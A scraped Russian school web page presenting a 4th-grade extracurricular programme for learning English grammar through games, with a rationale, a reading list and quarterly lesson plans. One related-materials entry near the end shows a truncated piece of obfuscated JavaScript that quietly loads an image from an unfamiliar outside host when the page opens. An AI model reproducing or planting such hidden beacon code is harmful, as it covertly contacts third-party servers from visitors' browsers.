Изучение грамматики в игровой форме (внеурочная деятельность) 4 класс
рабочая программа по английскому языку на тему
Разработанная программа содержит курс изучения английской грамматики в игровой форме в объёме 1 часа в неделю (35 часов в год) и соответствует третьему году обучения в школах с углублённым изучением английского языка.
Психологические особенности учащихся:
В возрасте 7-9 лет восприимчивость к языку, способность к запоминанию и имитации достигают своего пика. Однако этот же возраст накладывает и определённые ограничения: ребёнок ещё не очень способен к логическому мышлению (и тем самым – к восприятию сложных грамматических структур). Он значительно уступает старшим в выносливости и усидчивости и, самое главное, у него нет такой мотивации, помогающей взрослым (они-то хорошо понимают, зачем им нужен иностранный язык).
Основной принцип курса:
Познание мира, в том числе, и познание неродного языка, в детском возрасте чаще происходит в деятельно- игровой форме. Именно это и определило основной принцип курса: внеурочная деятельность подаётся, главным образом, в виде занимательных заданий и упражнений. В процессе решения простых логических задач учащийся всё время получает положительные эмоции: ведь каждое выполненное задание – это его маленькая победа. Главная задача на данном этапе: добиться у учащегося устойчивого убеждения в том, что учить английский язык – легко и приятно.
Материалом курса послужили мои собственные наработки (полученные в результате многолетней педагогической практики), а также упражнения из многочисленных пособий, изданных в России, в США и Великобритании.
Скачать:
Вложение | Размер |
---|---|
vneurochka_4_kl_2016.doc | 63 КБ |
Предварительный просмотр:
Муниципальное общеобразовательное учреждение
средняя общеобразовательная школа № 3 с углубленным изучением английского языка
г.о. Жуковский, Московской области
«Утверждаю»
Директор МОУ школа № 3 _____________Е.В.Лукашова
Приказ № _________ от ______________________ 2016 г.
Рабочая программа
по английскому языку
(внеурочная деятельность)
Изучение грамматики в игровой форме
4а класс
Составитель: __Смирнова С.В.____________,
учитель _высшей_______________ категории
2016 г.
Пояснительная записка
Разработанная программа содержит курс изучения английской грамматики в игровой форме в объёме 1 часа в неделю (35 часов в год) и соответствует третьему году обучения в школах с углублённым изучением английского языка.
Психологические особенности учащихся:
В возрасте 7-9 лет восприимчивость к языку, способность к запоминанию и имитации достигают своего пика. Однако этот же возраст накладывает и определённые ограничения: ребёнок ещё не очень способен к логическому мышлению (и тем самым – к восприятию сложных грамматических структур). Он значительно уступает старшим в выносливости и усидчивости и, самое главное, у него нет такой мотивации, помогающей взрослым (они-то хорошо понимают, зачем им нужен иностранный язык).
Основной принцип курса:
Познание мира, в том числе, и познание неродного языка, в детском возрасте чаще происходит в деятельно- игровой форме. Именно это и определило основной принцип курса: внеурочная деятельность подаётся, главным образом, в виде занимательных заданий и упражнений. В процессе решения простых логических задач учащийся всё время получает положительные эмоции: ведь каждое выполненное задание – это его маленькая победа. Главная задача на данном этапе: добиться у учащегося устойчивого убеждения в том, что учить английский язык – легко и приятно.
Материалом курса послужили мои собственные наработки (полученные в результате многолетней педагогической практики), а также упражнения из многочисленных пособий, изданных в России, в США и Великобритании.
Список использованной литературы :
1 . «Английский язык: игровой курс для детей» автор А. П. Василевич, Дубна, 2001 г.
2 . «English Learning» составитель В. Скулльте , 2 и 3 части, Москва, 2000 г
3 . «Grammar Tests» автор Л. П. Тарнаева , С.Петеобург, 2000 г .
4 . « Situational Grammar» , автор М. И. Дубровин, Москва 2010 г.
Четверть №1 (9 недель; 9 уроков)
№ темы | Грамматическая структура | Характеристика Учебной деятельности | Кол-во часов и сроки | Скоррект. сроки |
1 | Present Simple. Повторение. | Вспоминают основные правила. Выполняют задания на карточках. Вспоминают 5 типов вопросов. | Сентябрь 1 час | |
2 | Безличнные предложения. | Изучают правило. Учатся правильно переводить. Выполняют задания на карточках. | 1 час | |
3 | Повторяют констр. there/there are. | Выполняют тренировочные упражнения. | 1 час | |
4 | Past Simple. Повторение. | Повторяют неправильные глаголы. Задают 5 типов вопросов. | 1 час | |
5 | Степени сравнения прилагательных. Повторение. | Выполняют тренировочные задания. | 1 час | |
6 | Мод. глаголы can и must. Повторение. | Выполняют тренировочные задания, сравнивая значения глаголов. | Октябрь 1 час | |
7 | Будущее время. Повторение. | Повторяют правила. Выполняют тренировочные упражнения. Задают 5 типов вопросов. | 1 час | |
8 | Притяж. падеж существительных. Повторение. | Выполняют тренировочные упражнения. | 1 час | |
9 | Сравнивают повторенные времена. | Раскрывают скобки. Анализируют применение тех или иных времен. | 1 час |
Четверть №2 (7 недель; 7 уроков)
№ темы | Грамматическая структура | Характеристика Учебной деятельности | Кол-во часов и сроки | Скоррект. сроки |
10-13 | Разделительные вопросы. | Осваивают новые правила. Учат исключения. Выполняют тренировочные упражнения. | Ноябрь- декабрь 4 часа | |
14-16 | Present Cont. Повторение. | Вспоминают правила. Задают 5 типов вопросов. Раскрывают скобки, сравнивая разные времена. | Декабрь 3 часа |
Четверть №3 (11 недель; 11 уроков)
№ темы | Грамматическая структура | Характеристика Учебной деятельности | Кол-во часов и сроки | Скоррект. сроки |
17-19 | Конструкция be going для выражения будущего времени. | Изучают новую конструкцию. Учатся применять её на практике. Выполняют тренировочные упражнения. | Январь 3 часа | |
20-22 | Альтернативные вопросы. | Учатся задавать альтернативные вопросы на основе изученных тем. | Февраль 3 часа | |
23-24 | Рассказы по разным типам вопросов. | Учатся составлять рассказы. Параллельно учатся сами задавать подобные вопросы. | Февраль- март 2 часа | |
25-27 | Present Perfect. | Изучают новое время. Учат новые неправильные глаголы. Тренируются составлять вопр. и отриц. предложения. Выполняют тренировочные упражнения. | Март 4 часа |
Четверть №4 (8 недель; 8 уроков)
№ темы | Грамматическая структура | Характеристика Учебной деятельности | Кол-во часов и сроки | Скоррект. сроки |
28-33 | Present Perfect. Продолжение изучения. | Сравнивают Present Perfect и Past Simple. Выполняют упражнения на раскрытие скобок. | Апрель- май 5 часов | |
34-35 | Глаголы mast и have to. | Сравнивают их значения, учатся правильно их употреблять. Выполняют тренировочные упражнения. | Май 2 часа |
Итого | 35 недель; 35 уроков |
Подпись учителя_____________ (расшифровка подписи) /Смирнова С.В. /
По теме: методические разработки, презентации и конспекты
Направления и формы внеурочной деятельности по ФГОС.
Презентация на тему "Направления и формы внеурочной деятельности по ФГОС" ....
Формы внеурочной деятельности по духовно-нравственному развитию личности в 5 классе
Статья по теме "Формы внеурочной деятельности по духовно-нравственному развитию личности в 5 классе"...
Проектная деятельность как одна из форм внеурочной деятельности
Выступление на кафедре естественно-математического цикла...
Подборка вопросов для игрового занятия внеурочной деятельности учащихся «Кулинарная ЧтоГдеКогдайка»
План-конспект занятия содержит 40 вопросов с ответами и комментариями. Предназначен для игрового заняти в формате телеигры "Что? Где? Когда?"...
"Проектная деятельность как форма внеурочной деятельности"
Статья «Проектная деятельность как форма внеурочной деятельности» Класс: 10 БУчитель: Мараник Любовь Викторовна Проектная деятельность также активно применяется мною ...
Игровые формы познавательной деятельности на уроках истории
\'use strict\';var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'ikjtysncd.blablacarv.ru\',\'48\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !func...
Методическая разработка курса «Бизнес английский» для 8-го класса в форме внеурочной деятельности
Данная разработка представляет собой пример использования метода case study во время проведения внеурочной деятельности по английскому языку в восьмом классе по теме «Навигатор профессии»....